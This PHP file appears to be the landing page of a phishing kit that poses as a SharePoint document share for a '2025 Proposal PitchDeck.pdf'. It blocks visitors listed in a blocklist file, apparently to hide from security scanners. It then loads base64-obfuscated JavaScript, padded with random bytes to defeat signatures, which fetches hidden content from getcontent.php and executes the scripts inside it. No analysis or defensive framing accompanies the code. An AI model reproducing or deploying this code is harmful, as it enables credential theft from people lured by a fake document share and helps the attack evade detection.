<?php

$blockedEntries = file('ball.txt', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
$visitorIp = $_SERVER['REMOTE_ADDR'];
$visitorUA = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';

$blocked = false;
foreach ($blockedEntries as $entry) {
    $entry = trim($entry);
    if (strpos($visitorIp, $entry) !== false || strpos($visitorUA, $entry) !== false) {
        $blocked = true;
        break;
    }
}

if ($blocked) {
    header('HTTP/1.1 403 Forbidden');
    echo "Access Denied.";
    exit;
}

$companyName = $_GET['org'] ?? 'Sharepoint';
$documentName = $_GET['doc'] ?? '2025 Proposal PitchDeck.pdf';

$supportedLanguages = ['en', 'fr', 'es', 'de', 'ja', 'it', 'nl', 'pt'];
$detectedLang = 'en'; 

if (isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {
    $acceptLanguage = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
    
    $parts = explode(',', $acceptLanguage);
    foreach ($parts as $part) {
        $part = trim($part);
        
        if (strpos($part, ';') !== false) {
            $langCode = strtolower(trim(substr($part, 0, strpos($part, ';'))));
        } else {
            $langCode = strtolower(trim($part));
        }
        
        if (strpos($langCode, '-') !== false) {
            $langCode = substr($langCode, 0, strpos($langCode, '-'));
        } else {
            $langCode = substr($langCode, 0, 2);
        }
        
        if (strlen($langCode) === 2 && in_array($langCode, $supportedLanguages)) {
            $detectedLang = $langCode;
            break;
        }
    }
}


$lang = strtolower($_GET['lang'] ?? $detectedLang);

?>
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>File</title>
  <style>
    body { margin: 0; font-family: Arial, sans-serif; background: #f4f4f4; }
    #content-container { display: none; }
  </style>
</head>
<body>
  <div id="content-container"></div>

  <?php
  
  $jsCode = <<<JS
window.addEventListener('DOMContentLoaded', function() {
  var xhr = new XMLHttpRequest();
  // Pass the parameters to getcontent.php
  var url = "getcontent.php?org=" + encodeURIComponent("$companyName") + "&doc=" + encodeURIComponent("$documentName") + "&lang=" + encodeURIComponent("$lang");
  console.log("Requesting URL:", url); // Debug log
  xhr.open("GET", url, true);
  xhr.onreadystatechange = function() {
    if (xhr.readyState === XMLHttpRequest.DONE) {
      if (xhr.status === 200) {
        var encodedContent = xhr.responseText.trim();
        try {
          var decodedContent = atob(encodedContent);
          var tempDiv = document.createElement('div');
          tempDiv.innerHTML = decodedContent;
          var contentContainer = document.getElementById('content-container');
          while (tempDiv.firstChild) {
            contentContainer.appendChild(tempDiv.firstChild);
          }
          contentContainer.style.display = 'block';
          var scripts = contentContainer.getElementsByTagName('script');
          var scriptsArr = [];
          for (var i = 0; i < scripts.length; i++) {
            scriptsArr.push(scripts[i]);
          }
          scriptsArr.forEach(function(oldScript) {
            var newScript = document.createElement('script');
            if (oldScript.src) {
              newScript.src = oldScript.src;
            } else {
              newScript.textContent = oldScript.textContent;
            }
            document.body.appendChild(newScript);
          });
        } catch (e) {
          console.error("Decoding error:", e);
        }
      } else {
        console.error("Error fetching content. Status:", xhr.status);
      }
    }
  };
  xhr.send();
});
JS;

  $randomComment = "// " . bin2hex(random_bytes(1300)) . "\n";
  $jsCode = $randomComment . $jsCode;
  $encodedJs = base64_encode($jsCode);
  ?>

  <script>
    (function(){
      var encodedCode = "<?php echo trim($encodedJs); ?>";
      var decodedCode = atob(encodedCode);
      var scriptElem = document.createElement('script');
      scriptElem.text = decodedCode;
      document.body.appendChild(scriptElem);
    })();
  </script>
</body>
</html>
